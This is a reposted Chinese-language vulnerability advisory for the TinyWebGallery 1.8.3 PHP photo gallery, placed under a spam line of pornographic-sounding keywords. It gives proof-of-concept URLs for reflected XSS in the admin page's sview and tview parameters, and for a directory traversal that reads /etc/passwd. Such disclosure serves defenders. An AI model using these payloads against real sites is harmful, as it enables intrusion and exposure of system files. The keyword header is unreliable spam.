中文国产日韩欧美视频,午夜精品999,色综合天天综合网国产成人网,色综合视频一区二区观看,国产高清在线精品,伊人色播,色综合久久天天综合观看

TinyWebGallery 1.8.3版多個安全漏洞漏洞預警 -電腦資料

電腦資料 時間:2019-01-01 我要投稿
【www.szmdbiao.com - 電腦資料】

   

    TinyWebGallery是一款php相冊程序,TinyWebGallery 1.8.3中包含多個安全漏洞,包括目錄遍歷和XSS,可能導致敏感信息泄露,

TinyWebGallery 1.8.3版多個安全漏洞漏洞預警

。

    [+]info:

    ~~~~~~~~~

    Script. TinyWebGallery

    Version: 1.8.3 (No fixes yet, might work on other versions too).

    Home: http://www.tinywebgallery.com

    [+]poc:

    ~~~~~~~~~

    http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"

    http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"

    http://localhost/twg183/admin/index.php?dir=

    http://localhost/twg183/admin/index.php?action=chmod&item=

    http://localhost/twg183/twg183/admin/index.php?action=chmod&item=">

    http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

    [+]Reference:

    ~~~~~~~~~

    http://www.exploit-db.com/exploits/16090

最新文章